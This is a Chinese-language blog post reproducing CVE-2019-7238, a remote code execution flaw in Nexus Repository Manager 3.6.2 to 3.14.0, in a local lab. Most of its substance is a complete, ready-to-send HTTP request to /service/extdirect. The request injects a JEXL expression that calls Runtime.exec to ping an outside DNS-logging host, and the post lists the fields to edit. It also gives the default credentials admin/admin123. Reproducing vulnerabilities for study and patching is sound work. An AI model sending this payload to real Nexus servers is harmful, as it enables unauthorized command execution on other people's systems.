前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Nexus Repository Man

Nexus Repository Man

作者头像
py3study
发布2020-01-09 15:53:31
2.2K0
发布2020-01-09 15:53:31
举报
文章被收录于专栏:python3

Nexus Repository Manager 3 RCE CVE-2019-7238

0x00 参考链接

https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019

0x01 影响版本

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

0x02 复现环境搭建

操作系统: windows 10 nexus版本:Nexus Repository Manager 3.14.0-04 下载链接: https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3 nexus运行需要安装jdk环境,而且jdk需要去oracle下载,openjdk不可以

Nexus Repository Manager 3 RCE  CVE-2019-7238
Nexus Repository Manager 3 RCE CVE-2019-7238

下载完成后,解压nexus,在nexus-3.14.0-04\bin,执行 nexus.exe /run 直接访问localhost:8081 帐号密码 admin/admin123

0x03漏洞复现

首先需要上传一个资源,而真实环境则不需要,因为真实环境已经上传了assert

Nexus Repository Manager 3 RCE  CVE-2019-7238
Nexus Repository Manager 3 RCE CVE-2019-7238

然后访问content selectors

Nexus Repository Manager 3 RCE  CVE-2019-7238
Nexus Repository Manager 3 RCE CVE-2019-7238

抓包修改:

代码语言:javascript
复制
POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}

需要修改的点: {"property":"type","value":"jexl"} "value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org')"

Nexus Repository Manager 3 RCE  CVE-2019-7238
Nexus Repository Manager 3 RCE CVE-2019-7238
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019/08/24 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Nexus Repository Manager 3 RCE CVE-2019-7238
    • 0x00 参考链接
      • 0x01 影响版本
        • 0x02 复现环境搭建
          • 0x03漏洞复现
          相关产品与服务
          对象存储
          对象存储(Cloud Object Storage,COS)是由腾讯云推出的无目录层次结构、无数据格式限制,可容纳海量数据且支持 HTTP/HTTPS 协议访问的分布式存储服务。腾讯云 COS 的存储桶空间无容量上限,无需分区管理,适用于 CDN 数据分发、数据万象处理或大数据计算与分析的数据湖等多种场景。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档